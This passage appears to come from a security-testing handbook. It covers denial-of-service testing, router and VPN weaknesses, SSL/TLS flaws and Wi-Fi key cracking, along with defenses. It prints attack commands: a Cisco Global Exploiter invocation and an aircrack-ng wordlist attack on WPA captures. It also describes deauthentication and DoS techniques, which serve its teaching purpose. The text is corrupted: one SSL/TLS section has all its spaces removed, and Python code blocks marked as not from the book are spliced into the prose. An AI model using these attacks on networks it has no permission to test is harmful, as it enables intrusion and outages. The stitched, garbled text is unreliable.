Distributed DoS (DDoS) attacks have an exponentially greater impact on their victims. One of the most famous was the DDoS attack against eBay, Yahoo!, CNN, and dozens of other websites by a hacker known as MafiaBoy. While updating this book to the third edition, there was a highly publicized DDoS attack against Twitter, Facebook, and other social media sites. The attack was apparently aimed at one user from Georgia (the former Soviet country, not the state where I live), but it affected everyone using these sites. I couldn't tweet, and many of my friends and family members couldn't see what everyone was blabbing about on Facebook (oh, the humanity!). There have been numerous other highly publicized DDoS attacks since then. Think about this: When hundreds of millions of people can be taken offline by one targeted DDoS attack, you can see why understanding the dangers of denial of service against your business's systems and applications is important.

Testing

Denial of service testing is one of the most difficult security checks you can run. There just aren't enough of you and your computers to go around. Don't fret. You can run a few tests to see where you're weak. Your first test should be a search for DoS vulnerabilities from a vulnerability-scanning perspective. Using vulnerability scanners, such as Nexpose (www.rapid7.com/products/nexpose) and AppSpider (www.rapid7.com/products/appspider), you can find missing patches and configuration weaknesses that can lead to denial of service.

I once performed a security assessment where I used Qualys to find a vulnerability in an older version of OpenSSL running on a web server. As with most DoS findings, I didn't actually exploit the vulnerability because I didn't want to take down the production system. Instead, I listed it as a "medium priority" vulnerability, an issue that had the potential to be exploited. My client pushed back and said OpenSSL wasn't on the system. With permission, I downloaded the exploit code available on the Internet, compiled it, and ran it against my client's server. Sure enough, it took the server offline.

At first, my client thought it was a fluke, but after taking the server offline again, he bought into the vulnerability. It ended up that he was using an OpenSSL derivative, hence the vulnerability. Had my client not fixed the problem, there could have been any number of attackers around the world taking, and keeping, this production system offline, which could have been both tricky and time consuming to troubleshoot. Not good for business!

Don't test for DoS unless you have test systems or can perform controlled tests with the proper tools. Poorly planned DoS testing is a job search in the making. It's like trying to delete data from a network share and hoping that the access controls in place are going to prevent it.

Other DoS testing tools worth checking out are UDP Flood (www.mcafee.com/us/downloads/free-tools/udpflood.aspx), Blast (www.mcafee.com/us/downloads/free-tools/blast.aspx), NetScanTools Pro, and CommView.

Countermeasures against DoS attacks

Most DoS attacks are difficult to predict, but they can be easy to prevent:

- Test and apply security patches (including service packs and firmware updates) as soon as possible for network hosts, such as routers and firewalls, as well as for server and workstation operating systems.
- Use an IPS to monitor regularly for DoS attacks. You can run a network analyzer in continuous capture mode if you can't justify the cost of an all-out IPS solution and use it to monitor for DoS attacks.
- Configure firewalls and routers to block malformed traffic. You can do this only if your systems support it, so refer to your administrator's guide for details.
- Minimize IP spoofing by filtering out external packets that appear to come from an internal address, the local host (127.0.0.1), or any other private and non-routable address, such as 10.x.x.x, 172.16.x.x–172.31.x.x, or 192.168.x.x. The following paper from Cisco Systems provides more information: www.cisco.com/web/about/ac123/ac147/archived_issues/ipj_10-4/104_ip-spoofing.html.
- Block all ICMP traffic inbound to your network unless you specifically need it. Even then, you should allow it to come in only to specific hosts.
- Disable all unneeded TCP/UDP small services, such as echo and chargen.

Establish a baseline of your network protocols and traffic patterns before a DoS attack occurs. That way, you know what to look for. And periodically scan for such potential DoS vulnerabilities as rogue DoS software installed on network hosts.

If you get yourself in a real bind and end up under direct DoS assault, you can reach out to managed service vendors such as Imperva's Incapsula (www.incapsula.com), CloudFlare (www.cloudflare.com), and DOSarrest (www.dosarrest.com) who can help you out.

Work with a minimum necessary mentality (not to be confused with having too many craft beers) when configuring your network devices, such as firewalls and routers:

- Identify traffic that is necessary for approved network usage.
- Allow the traffic that's needed.
- Deny all other traffic.

If worse comes to worst, you'll need to work with your ISP and see whether they can block DoS attacks on their end.

Detecting Common Router, Switch, and Firewall Weaknesses

In addition to the more technical exploits that I cover in this chapter, some high-level security vulnerabilities commonly found on network devices can create many problems.

Finding unsecured interfaces

You want to ensure that HTTP and telnet interfaces to your routers, switches, and firewall aren't configured with a blank, default, or otherwise easy-to-guess password. This advice sounds like a no-brainer, but it's by far one of the most common weaknesses. When a malicious insider or other attacker gains access to your network devices, he owns the network. He can then lock out administrative access, set up back-door user accounts, reconfigure ports, and even bring down the entire network without you ever knowing.

I once found a simple password that a systems integrator had configured on a Cisco ASA firewall and was able to log in to the firewall with full administrative rights. Just imagine what could happen in this situation if someone with malicious intent came across this password. Lesson learned: It's the little things that can get you. Know what your vendors are doing and keep an eye on them!

Another weakness is related to HTTP and telnet being enabled and used on many network devices. Care to guess why this is a problem? Well, anyone with some free tools and a few minutes of time can sniff the network and capture login credentials for these systems when they're being sent in cleartext. When that happens, anything goes.

Exploiting IKE weaknesses

Businesses running a VPN on a router or firewall are common. If you fall into this category, chances are good that your VPN is running the Internet Key Exchange (IKE) protocol, which has a couple of well-known exploitable weaknesses:

- It's possible to crack IKE "aggressive mode" pre-shared keys using Cain & Abel and the IKECrack tool (http://ikecrack.sourceforge.net). In aggressive mode the responder sends a hash derived from the pre-shared key in the clear during the first exchange, so anyone who captures (or solicits) that handshake can brute-force the key offline at leisure.
- Some IKE configurations, such as those in certain Cisco PIX firewalls, can be taken offline. All the attacker has to do is send 10 packets per second at 122 bytes each and you have a DoS attack on your hands.

You can manually poke around to see whether your router, switches, and firewalls are vulnerable to these issues, but the best way to find this information is to use a well-known vulnerability scanner, such as Nexpose. After you find which vulnerabilities exist, you can take things a step further by using the Cisco Global Exploiter tool (available via the Kali Linux toolset). To run Cisco Global Exploiter, follow these steps:

1. Download and burn the Kali Linux ISO image to DVD or boot the image directly through VMware or VirtualBox.

2. After you enter the Kali Linux GUI, click Applications, Vulnerability Analysis, Cisco Tool, and then cisco-global-exploiter.

3. Enter the command perl cge.pl ip_address exploit_number, as shown in Figure 9-14.

Figure 9-14: Cisco Global Exploiter tool for exploiting well-known Cisco weaknesses.

Keep in mind that the exploits bundled in cge.pl target bugs that are many years old; a current IOS image is rarely affected, so a clean run says nothing about newer weaknesses.

Another Cisco router-related tool is called SYNful Knock Scanner (http://talosintel.com/scanner) that tests systems for the nasty SYNful Knock malware that was discovered in 2015.

Good scanners and exploitation tools will save you a ton of time and effort that you can spend on other, more important things, such as Facebook and Twitter.

UncoveringissueswithSSLandTLSSSLandTransportLayerSecurity(TLS)werelongtoutedasthesolutionforsecuringnetworkcommunications.However,recently,SSLandTLShavecomeunderfirewithdemonstrableexploitssuchasHeartbleed,PaddingOracleOnDowngradedLegacyEncryption(POODLE),andFactoringAttackonRSA-EXPORTKeys(FREAK).

GeneralsecurityvulnerabilitiesrelatedtoSSLandTLSareoftenuncoveredbyvulnerabilityscannerssuchasNexposeandNetsparker.InadditiontothethreeSSL/TLSvulnerabilitiesabove,beonthelookoutforthefollowingflawsaswell:

SSLversions2or3aswellasTLSversions1.0or1.1inuse.WeakencryptioncipherssuchasRC4andSHA-1.

IfyouareunsureaboutexistingSSLandTLSvulnerabilitiesonyoursystems,youdon’thavetouseavulnerabilityscanneratall.QualyshasanicewebsitecalledSSLLabs(www.ssllabs.com)thatwillscanforthesevulnerabilitiesforyou.

Ididn’tusedtobetooconcernedwithSSLandTLS-relatedvulnerabilities,butassecurityresearchersandcriminalhackershavebeendemonstrating,thethreatisrealandneedstobeaddressed.
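To make the two flaws listed above concrete, here is an added example (mine, not code from the book or from any scanner it names) that audits a TLS configuration in Python's ssl module against exactly those rules: a protocol floor below TLS 1.2, and RC4, DES, export, anonymous or SHA-1 cipher suites. The legacy settings it checks are a constructed sample; the hardened context is the corrected setting.

```python
"""Audit a TLS configuration for the SSL/TLS flaws listed in the text.

Added example, not from the book. It checks the same two things a scanner
such as SSL Labs reports, but offline and on this process's own settings:
the minimum protocol version and the enabled cipher suites.
"""
import ssl

# Protocol versions the text flags as deprecated (SSLv2 is not even
# representable as an ssl.TLSVersion member in modern Python builds).
DEPRECATED_VERSIONS = {ssl.TLSVersion.SSLv3, ssl.TLSVersion.TLSv1, ssl.TLSVersion.TLSv1_1}

# Fragments of OpenSSL cipher-suite names that mark weak algorithms.
WEAK_FRAGMENTS = ("RC4", "DES", "NULL", "EXPORT", "MD5", "ANON")


def weak_cipher(name: str) -> bool:
    """True for RC4, (3)DES, export, anonymous and NULL suites, and for suites
    whose MAC is SHA-1. OpenSSL names SHA-1 suites with a bare '-SHA' suffix
    (ECDHE-RSA-AES128-SHA); SHA-2 suites end in -SHA256 or -SHA384."""
    upper = name.upper()
    return any(frag in upper for frag in WEAK_FRAGMENTS) or upper.endswith("-SHA")


def audit_settings(min_version, cipher_names):
    """Findings for a (minimum protocol version, enabled cipher list) pair."""
    findings = []
    if min_version == ssl.TLSVersion.MINIMUM_SUPPORTED or min_version in DEPRECATED_VERSIONS:
        findings.append(f"minimum protocol {min_version.name} permits SSL/TLS below 1.2")
    findings.extend(f"weak cipher suite enabled: {n}" for n in cipher_names if weak_cipher(n))
    return findings


def audit_context(ctx: ssl.SSLContext):
    """Audit a live SSLContext: what this process would actually negotiate."""
    return audit_settings(ctx.minimum_version, [c["name"] for c in ctx.get_ciphers()])


def legacy_settings():
    """Constructed sample of the weak configuration: TLS 1.0 floor, RC4 and 3DES on."""
    return ssl.TLSVersion.TLSv1, ["RC4-SHA", "DES-CBC3-SHA", "ECDHE-RSA-AES128-GCM-SHA256"]


def hardened_client_context() -> ssl.SSLContext:
    """The corrected setting: TLS 1.2+ only, AEAD suites with SHA-2 only."""
    ctx = ssl.create_default_context()
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:DHE+AESGCM:!aNULL")
    return ctx


if __name__ == "__main__":
    for label, findings in (("legacy", audit_settings(*legacy_settings())),
                            ("hardened", audit_context(hardened_client_context()))):
        print(label, findings or "no findings")
```

The check on the live context is the one to keep: it reads back what OpenSSL will really offer after your cipher string is applied, which is what a remote scanner sees, rather than what the configuration file says.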

Putting Up General Network Defenses

Regardless of the specific attacks against your system, a few good practices can help prevent many network problems:

Use stateful inspection rules that monitor traffic sessions for firewalls. This can help ensure that all traffic traversing the firewall is legitimate and can prevent DoS attacks and other spoofing attacks.

Implement rules to perform packet filtering based on traffic type, TCP/UDP ports, IP addresses, and even specific interfaces on your routers before the traffic is allowed to enter your network.

Use proxy filtering and Network Address Translation (NAT) or Port Address Translation (PAT).

Find and eliminate fragmented packets entering your network (from Fraggle or another type of attack) via an IPS.

Include your network devices in your vulnerability scans.

Ensure your network devices have the latest vendor firmware and patches applied.

Set strong passwords—better yet, passphrases—on all network systems. I cover passwords in more detail in Chapter 8.

Don’t use IKE aggressive mode pre-shared keys for your VPN. If you must, ensure the passphrase is strong and changed periodically (such as every 6–12 months).

Always use TLS (via HTTPS, etc.) or SSH when connecting to network devices.

Disable SSL and weak ciphers and only use TLS version 1.2 and strong ciphers such as SHA-2 where possible.

Segment the network and use a firewall on the following:

The DMZ

The internal network

Critical subnetworks broken down by business function or department, such as accounting, finance, HR, and research

Chapter 10

Wireless Networks

In This Chapter

Understanding risks of wireless networks

Selecting wireless network hacking tools

Cracking wireless encryption

Minimizing wireless network risks

Wireless local area networks (or Wi-Fi)—specifically, the ones based on the IEEE 802.11 standard—are increasingly being deployed into both business and home networks. Wi-Fi has been the poster child for weak security and network hack attacks since the inception of 802.11 a decade and a half ago. The stigma of unsecure Wi-Fi is starting to wane, but this isn’t the time to lower your defenses.

Wi-Fi offers a ton of business value, from convenience to reduced network deployment time. Whether or not your organization allows wireless network access, you probably have it, so testing for Wi-Fi security vulnerabilities is critical. In this chapter, I cover some common wireless network security vulnerabilities that you should test for, and I discuss some cheap and easy countermeasures that you can implement to help ensure that Wi-Fi isn’t more of a risk to your organization than it’s worth.

Understanding the Implications of Wireless Network Vulnerabilities

Wi-Fi is very susceptible to attack—even more so than wired networks (discussed in Chapter 9) if it’s not configured or deployed properly. Wireless networks have long-standing vulnerabilities that can enable an attacker to bring your network to its knees or allow your sensitive information to be extracted right out of thin air. If your wireless network is compromised, you can experience the following problems:

Loss of network access, including e-mail, web, and other services that can cause business downtime

Loss of sensitive information, including passwords, customer data, intellectual property, and more

Regulatory consequences and legal liabilities associated with unauthorized users gaining access to your business systems

Most of the wireless vulnerabilities are in the implementation of the 802.11 standard. Wireless access points (APs) and client systems have some vulnerabilities as well.

Various fixes have come along in recent years to address these vulnerabilities, yet still many of these fixes haven’t been properly applied or aren’t enabled by default. Your employees might also install rogue wireless equipment on your network without your knowledge. Then there’s “free” Wi-Fi practically everywhere your mobile workforce goes. From coffee shops to hotels to conference centers, these Internet connections are one of the most serious threats to your overall information security and a pretty difficult one to fight. Even when Wi-Fi is hardened and all the latest patches have been applied, you still might have security problems, such as denial of service (DoS), man-in-the-middle attacks, and encryption key weaknesses (like you have on wired networks—see Chapter 9), that will likely be around for a while.

Choosing Your Tools

Several great wireless security tools are available for both the Windows and Linux platforms. Earlier on, Linux wireless tools were a bear to configure and run properly, probably because I’m not that smart. However, that problem has changed in recent years with programs such as Kismet (www.kismetwireless.net), Wellenreiter (http://sourceforge.net/projects/wellenreiter), and Kali Linux (www.kali.org).

If you want the power of the security tools that run on Linux, but you’re not interested in installing and learning much about Linux or don’t have the time to download and set up many of its popular security tools, I highly recommend you check out Kali Linux. The bootable Debian-based security testing suite comes with a slew of tools that are relatively easy to use. Alternative bootable (or live) testing suites include the Fedora Linux-based Network Security Toolkit (www.networksecuritytoolkit.org). A complete listing of live bootable Linux toolkits is available at www.livecdlist.com.

Most of the tests I outline in this chapter require only Windows-based utilities, but use the platform you’re most familiar with. You’ll get better results that way. My favorite tools for assessing wireless networks in Windows are as follows:

Aircrack-ng (http://aircrack-ng.org)

CommView for WiFi (www.tamos.com/products/commwifi)

ElcomSoft Wireless Security Auditor (www.elcomsoft.com/ewsa.html)

OmniPeek (www.savvius.com)

You can also use a handheld wireless security testing device, such as the handy Digital Hotspotter by Canary Wireless (www.canarywireless.com), and even your Android-based phone or tablet with apps such as WiEye or Wifi Analyzer, or an iOS device with apps such as Network Analyzer and Network Multimeter. An external antenna is also something to consider as part of your arsenal. I have had good luck running tests without an antenna, but your mileage may vary. If you’re performing a walkthrough of your facilities to test for wireless signals, for example, using an additional antenna increases your odds of finding both legitimate and (more important) unauthorized wireless systems. You can choose among three types of wireless antennas:

Omnidirectional: Transmits and receives wireless signals in 360 degrees over shorter distances, such as in boardrooms or reception areas. These antennas, also known as dipoles, typically come installed on APs from the factory.

Semidirectional: Transmits and receives directionally focused wireless signals over medium distances, such as down corridors and across one side of an office or building.

Directional: Transmits and receives highly focused wireless signals over long distances, such as between buildings. This antenna, also known as a high-gain antenna, is the antenna of choice for wireless hackers driving around cities looking for vulnerable APs—an act known as wardriving.

As an alternative to the antennas described in the preceding list, you can use a nifty can design—called a cantenna—made from a Pringles, coffee, or pork-and-beans can. If you’re interested in trying this, check out the article at www.turnpoint.net/wireless/has.html for details. A simple Internet search turns up a lot of information on this subject, if you’re interested. One site in particular (www.cantenna.com) sells the Super Cantenna kit, which has worked well for me.

Discovering Wireless Networks

After you have a wireless card and wireless testing software, you’re ready to roll. The first tests you should perform gather information about your wireless network, as described in the following sections.

Checking for worldwide recognition

The first test requires only the MAC address of your AP and access to the Internet. (You can find out more about MAC addresses later in this chapter, in the “MAC spoofing” section.) You’re testing to see whether someone has discovered your Wi-Fi signal and posted information about it for the world to see. Here’s how the test works:

1. Find your AP’s MAC address.

If you’re not sure what your AP’s MAC address is, you should be able to view it by using the arp -a command at a Windows command prompt. You might have to ping the access point’s IP address first so the MAC address is loaded into your ARP cache. Figure 10-1 shows what this can look like.

2. After you have the AP’s MAC address, browse to the WiGLE database of wireless networks (https://wigle.net).

3. Register with the site so you can perform database queries. It’s worth it.

4. Select the Login link in the upper right corner of the website and then select View and then Search.

You see a screen similar to Figure 10-2.

5. To see whether your network is listed, you can enter such AP information as geographical coordinates and SSID (service set identifier), but the simplest thing to do is enter your MAC address in the format shown in the example for the BSSID/MAC text box.

If your AP is listed, someone has discovered it—most likely via wardriving—and has posted the information for others to see. You need to start implementing the security countermeasures listed in this chapter as soon as possible to keep others from using this information against you!

Figure 10-1: Finding the MAC address of an AP by using arp.

Figure 10-2: Searching for your wireless APs using the WiGLE database.

Scanning your local airwaves

Monitor the airwaves around your building to see what authorized and unauthorized APs you can find. You’re looking for the SSID, which is your wireless network name. If you have multiple and separate wireless networks, each one may or may not have a unique SSID associated with it.

You can get started with a tool such as NetStumbler (www.netstumbler.com/downloads). NetStumbler can discover SSIDs and other detailed information about wireless APs, including the following:

MAC address

Name

Radio channel in use

Vendor name

Whether encryption is on or off

RF signal strength (signal-to-noise ratio)

NetStumbler is quite old and is no longer maintained, but it still works nonetheless. Another tool option is inSSIDer (www.inssider.com).

Figure 10-3 shows an example of what you might see when running NetStumbler in your environment. The information that you see here is what others can see as long as they’re in range of your AP’s radio signals. NetStumbler and most other tools work by sending a probe-request signal from the client. Any APs within signal range must respond to the request with their SSIDs—that is, if they’re configured to broadcast their SSIDs upon request.

Figure 10-3: NetStumbler displays detailed data on APs.

When you’re using wireless network analyzers, including OmniPeek and CommView for WiFi, your adapter might enter passive monitoring mode. This means you can no longer communicate with other wireless hosts or APs while the program is loaded.

Discovering Wireless Network Attacks and Taking Countermeasures

Various malicious hacks—including DoS attacks—can be carried out against your WLAN. This includes forcing APs to reveal their SSIDs during the process of being disassociated from the network and rejoining. In addition, hackers can literally jam the RF signal of an AP—especially in 802.11b and 802.11g systems—and force the wireless clients to re-associate to a rogue AP masquerading as the victim AP.

Hackers can create man-in-the-middle attacks by maliciously using a tool such as the WiFi Pineapple (www.wifipineapple.com/index.php) and can flood your network with thousands of packets per second by using the raw packet-generation tools Nping (https://nmap.org/nping) or NetScanTools Pro (www.netscantools.com)—enough to bring the network to its knees. Even more so than with wired networks, this type of DoS attack is very difficult to prevent on Wi-Fi.

You can carry out several attacks against your WLAN. The associated countermeasures help protect your network from these vulnerabilities as well as from the malicious attacks previously mentioned. When testing your WLAN security, look out for the following weaknesses:

Unencrypted wireless traffic

Weak WEP and WPA pre-shared keys

Crackable Wi-Fi Protected Setup (WPS) PINs

Unauthorized APs

Easily circumvented MAC address controls

Wireless equipment that’s physically accessible

Default configuration settings

A good starting point for testing is to attempt to attach to your WLAN as an outsider and run a general vulnerability assessment tool, such as LanGuard or Nexpose. This test enables you to see what others can see on your network, including information on the OS version, open ports on your AP, and even network shares on wireless clients. Figure 10-4 shows the type of information that can be revealed about an AP on your network, including a missing administrator password, an outdated operating system, and open ports and shares that can be exploited.

Figure 10-4: A LanGuard scan of a live AP.

Don’t overlook Bluetooth

You undoubtedly have various Bluetooth-enabled wireless devices, such as laptops and smartphones, running within your organization. Although vulnerabilities are not as prevalent as they are in 802.11-based Wi-Fi networks, they still exist (currently, over 100 Bluetooth-related weaknesses are listed at http://nvd.nist.gov), and quite a few hacking tools take advantage of them. You can even overcome the personal area network distance limitation of Bluetooth’s signal (typically just a few meters) and attack Bluetooth devices remotely by building and using a BlueSniper rifle. (See the following list for the website.) Various resources and tools for testing Bluetooth authentication/pairing and data transfer weaknesses include:

Blooover (http://trifinite.org/trifinite_stuff_blooover.html)

Bluelog—part of Kali Linux

BlueScanner (http://sourceforge.net/projects/bluescanner)

Bluesnarfer (www.alighieri.org/tools/bluesnarfer.tar.gz)

BlueSniper rifle (www.tomsguide.com/us/how-to-bluesniper-pt1,review-408.html)

Btscanner—part of Kali Linux

Car Whisperer (http://trifinite.org/trifinite_stuff_carwhisperer.html)

Detailed presentation on the various Bluetooth attacks (http://trifinite.org/Downloads/21c3_Bluetooth_Hacking.pdf)

Although many (arguably most) Bluetooth-related flaws are not high risk, they still need to be addressed based on your own unique circumstances. Make sure that Bluetooth testing falls within the scope of your overall security assessments and oversight.

Encrypted traffic

Wireless traffic can be captured directly out of the airwaves, making this communications medium susceptible to eavesdropping. Unless the traffic is encrypted, it’s sent and received in cleartext just as on a standard wired network. On top of that, the 802.11 encryption protocols, Wired Equivalent Privacy (WEP)—yep, it’s still around—and Wi-Fi Protected Access (WPA), have their own weakness that allows attackers to crack the encryption keys and decrypt the captured traffic. This vulnerability has really helped put Wi-Fi on the map—so to speak.

WEP, in a certain sense, actually lives up to its name: It provides privacy equivalent to that of a wired network, and then some. However, it wasn’t intended to be cracked so easily. WEP uses a fairly strong symmetric (shared-key) encryption algorithm called RC4. Hackers can observe encrypted wireless traffic and recover the WEP key because of a flaw in how the RC4 initialization vector (IV) is implemented in the protocol. This weakness is because the IV is only 24 bits long, which causes it to repeat every 16.7 million packets—even sooner in many cases, based on the number of wireless clients entering and leaving the network.

Most WEP implementations initialize wireless hardware with an IV of 0 and increment it by 1 for each packet sent. This can lead to the IVs reinitializing—starting over at 0—approximately every five hours. Given this behavior, Wi-Fi networks that have a lower amount of usage can be more secure than large Wi-Fi environments that transmit a lot of wireless data because there’s simply not enough wireless traffic being generated.
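The two numbers in the text (a 24-bit IV that repeats every 16.7 million packets, and a counter that starts over about every five hours) follow from the IV size alone. The added example below (mine, not from the book) works them out and adds the birthday bound, which shows how soon randomly chosen IVs collide even without a counter wrap; the packet rates it plugs in are assumed values.

```python
"""Why a 24-bit WEP initialization vector is too small. Added example, not
from the book. Two effects are described in the text: a sequential IV
counter wraps after 2**24 packets, and a counter reset to 0 on every
(re)initialization brings the repeat forward. The birthday bound below
covers the third case, an implementation that picks IVs at random."""
import math

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS            # 16,777,216 distinct IVs


def hours_until_iv_wrap(packets_per_second: float) -> float:
    """Hours until a counter-style IV (0, 1, 2, ...) starts over at 0."""
    return IV_SPACE / packets_per_second / 3600


def expected_packets_to_first_repeat(space: int = IV_SPACE) -> float:
    """Expected number of random IVs drawn before the first repeat: ~sqrt(pi*N/2)."""
    return math.sqrt(math.pi * space / 2)


def packets_for_collision_probability(p: float, space: int = IV_SPACE) -> int:
    """Random IVs needed for P(at least one repeat) >= p (birthday bound:
    n ~ sqrt(2 * N * ln(1 / (1 - p))))."""
    return math.ceil(math.sqrt(2 * space * math.log(1 / (1 - p))))


if __name__ == "__main__":
    # Assumed traffic rates; roughly 930 packets/s gives the five-hour figure.
    for pps in (100, 930, 5000):
        print(f"{pps:5d} packets/s: counter IV wraps after {hours_until_iv_wrap(pps):.1f} h")
    print(f"random IVs: first repeat expected after ~{expected_packets_to_first_repeat():.0f} packets,")
    print(f"50% chance of a repeat within {packets_for_collision_probability(0.5)} packets")
```

The random-IV figures are the point a busy-versus-quiet network comparison misses: a few thousand frames, not millions, are enough for a reused keystream, so low traffic only buys time, not safety.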

Using WEPCrack (http://sourceforge.net/projects/wepcrack) or Aircrack-ng (http://aircrack-ng.org), attackers need to collect only a few minutes’ up to a few days’ (depending on how much wireless traffic is on the network) worth of packets to break the WEP key. Figure 10-5 shows airodump-ng (which is part of the Aircrack-ng suite) capturing WEP initialization vectors, and Figure 10-6 shows aircrack at work cracking the WEP key of my test network.

Figure 10-5: Using airodump to capture WEP initialization vectors.

Figure 10-6: Using aircrack to crack WEP.

Airodump and aircrack are very simple to run in Windows. You just download and extract the aircrack programs, the cygwin Linux simulation environment, and the supporting peek files from http://aircrack-ng.org and you’re ready to capture packets and crack away!

A longer key length, such as 128 bits or 192 bits, doesn’t make WEP exponentially more difficult to crack. This is because WEP’s static key scheduling algorithm requires that only about 20,000 or so additional packets be captured to crack a key for every extra bit in the key length.

The wireless industry came up with a solution to the WEP problem called Wi-Fi Protected Access (WPA). WPA uses the Temporal Key Integrity Protocol (TKIP) encryption system, which fixes all the known WEP issues. WPA2, which quickly replaced the original WPA, uses an even stronger encryption method called Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (say that fast three times), or CCMP for short, based on the Advanced Encryption Standard (AES). WPA and WPA2 running in “enterprise mode” require an 802.1x authentication server, such as a RADIUS server, to manage user accounts for the WLAN.

For non-enterprise wireless APs (and there are plenty out there in business), there’s no good reason to not be running WPA2 using pre-shared keys (PSKs).

You can also use aircrack to crack WPA and WPA2-PSK. To crack WPA-PSK encryption, you have to wait for a wireless client to authenticate with its access point. A quick (and dirty) way to force the re-authentication process is to send a de-authenticate packet to the broadcast address. This is something my co-author, Peter T. Davis, and I cover in detail in our book, Hacking Wireless Networks For Dummies.

You can use airodump to capture packets and then start aircrack (you can also run them simultaneously) to initiate cracking the pre-shared key by using the following command-line options:

# aircrack-ng -a 2 -w path_to_wordlist <capture file(s)>

WPA key recovery is dependent on a good dictionary. The dictionary files available at www.outpost9.com/files/WordLists.html are a good starting point. Even with a great dictionary chock-full of potential passwords, I’ve often found that dictionary attacks against WPA are futile. Know your limits so you don’t waste too much time trying to crack WPA PSKs that are not crackable.

Another commercial alternative for cracking WPA and WPA2 keys is ElcomSoft Wireless Security Auditor (EWSA). To use EWSA, you simply capture wireless packets in the tcpdump format (every WLAN analyzer supports this format), load the capture file into the program, and shortly thereafter you have the PSK. EWSA is a little different because it can crack WPA and WPA2 PSKs in a fraction of the time it would normally take, but there’s a caveat. You must have a computer with a supported NVIDIA or AMD video card. Yep, EWSA doesn’t just use the processing power of your CPU—it also harnesses the power and mammoth acceleration capabilities of the video card’s graphics processing unit (GPU). Now that’s innovation!

The main EWSA interface is shown in Figure 10-7.

Figure 10-7: Using ElcomSoft Wireless Security Auditor to crack WPA pre-shared keys.

Using EWSA, you can try to crack your WPA/WPA2 PSKs at a rate of up to 173,000 WPA/WPA2 pre-shared keys per second. Compare that to the lowly few hundred keys per second using just the CPU and you can see the value in a tool like this. I always say you get what you pay for!

If you need to use your WLAN analyzer to view traffic as part of your security assessment, you won’t see any traffic if WEP or WPA/WPA2 are enabled unless you know the keys associated with each network. You can enter each key into your analyzer, but just remember that hackers can do the same thing if they’re able to crack your WEP or WPA pre-shared keys by using one of the tools I mention earlier.

Figure 10-8 shows an example of how you can view protocols on your WLAN by entering the WPA key into OmniPeek via the Capture Options window before you start your packet capture.

Figure 10-8: Using OmniPeek to view encrypted wireless traffic.

Countermeasures against encrypted traffic attacks

The simplest solution to the WEP problem is to migrate to WPA2 for all wireless communications. You can also use a VPN in a Windows environment—free—by enabling Point-to-Point Tunneling Protocol (PPTP) for client communications. You can also use the IPSec support built into Windows, as well as Secure Shell (SSH), Secure Sockets Layer/Transport Layer Security (SSL/TLS), and other proprietary vendor solutions, to keep your traffic secure. Just keep in mind that there are cracking programs for PPTP, IPSec, and other VPN protocols as well, but overall, you’re pretty safe, especially compared to no VPN at all.

Newer 802.11-based solutions exist as well. If you can configure your wireless hosts to regenerate a new key dynamically after a certain number of packets have been sent, the WEP vulnerability can’t be exploited. Many AP vendors have already implemented this fix as a separate configuration option, so check for the latest firmware with features to manage key rotation. For instance, the proprietary Cisco LEAP protocol uses per-user WEP keys that offer a layer of protection if you’re running Cisco hardware. Again, be careful because cracking programs exist for LEAP, such as asleap (http://sourceforge.net/projects/asleap). The best thing to do is just stay away from WEP.

The 802.11i standard from the IEEE integrates the WPA fixes and more. This standard is an improvement over WPA but is not compatible with older 802.11b hardware because of its implementation of the Advanced Encryption Standard (AES) for encryption in WPA2.

If you’re using WPA2 with a pre-shared key (which is more than enough for small Wi-Fi), ensure that the key contains at least 20 random characters so it isn’t susceptible to the offline dictionary attacks available in such tools as Aircrack-ng and ElcomSoft Wireless Security Auditor. The attack settings for ElcomSoft Wireless Security Auditor are shown in Figure 10-9.

Figure 10-9: ElcomSoft Wireless Security Auditor’s numerous password cracking options.

As you can see, everything from plain dictionary attacks to combination attacks to hybrid attacks that use specific word rules is available. Use a long, random pre-shared key so you don’t fall victim to someone with a lot of time on their hands!
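The offline cracking passages above and the 20-random-character advice come down to one calculation. The added example below (mine, not code from the book or from any of the tools it names) derives a WPA/WPA2 PSK the way the 802.11i standard specifies, PBKDF2-HMAC-SHA1 with 4,096 iterations salted by the SSID, and sizes the keyspace an attacker would have to cover at the 173,000 keys per second quoted for EWSA. The passphrase shapes compared are assumptions; the passphrase/SSID pair printed at the end is the test vector from the 802.11i standard.

```python
"""WPA/WPA2 pre-shared key derivation and keyspace arithmetic.
Added example, not from the book or from Aircrack-ng/EWSA."""
import hashlib

PBKDF2_ITERATIONS = 4096   # fixed by IEEE 802.11i for the passphrase-to-PSK mapping
PSK_LEN = 32               # the PSK doubles as the 256-bit pairwise master key
EWSA_RATE = 173_000        # keys per second quoted in the text for a GPU-assisted cracker


def derive_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 iterations, 32 bytes).
    Every offline guess costs the attacker these 4,096 HMAC rounds, which is
    why cracking speed is quoted in keys per second rather than millions."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ITERATIONS, PSK_LEN)


def keyspace(alphabet_size: int, length: int) -> int:
    """Number of passphrases of a given length drawn from a given alphabet."""
    return alphabet_size ** length


def years_to_exhaust(alphabet_size: int, length: int, rate: float = EWSA_RATE) -> float:
    """Worst-case time to try every passphrase of this shape at the given rate."""
    return keyspace(alphabet_size, length) / rate / (365 * 24 * 3600)


if __name__ == "__main__":
    # Assumed passphrase shapes: 8 lowercase letters versus the text's 20 random
    # characters, here drawn from letters and digits (62 symbols).
    for label, alphabet, length in (("8 lowercase letters", 26, 8),
                                    ("20 random alphanumerics", 62, 20)):
        print(f"{label}: {keyspace(alphabet, length):.3g} keys, "
              f"{years_to_exhaust(alphabet, length):.3g} years at {EWSA_RATE} keys/s")
    print("PSK for 802.11i test vector (passphrase 'password', SSID 'IEEE'):",
          derive_psk("password", "IEEE").hex())
```

Note that the salt is the SSID, so a precomputed table only helps against one network name; an AP left on a default SSID gives that advantage away, which is another reason to rename it.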

Keep in mind that although WEP and weak WPA pre-shared keys are crackable, it’s still much better than no encryption at all. Similar to the effect that home security system signs have on would-be home intruders, a wireless LAN running WEP or weak WPA pre-shared keys is not nearly as attractive to a criminal hacker as one without it. Many intruders are likely to move on to easier targets unless they really want to get into yours.

Wi-Fi Protected Setup

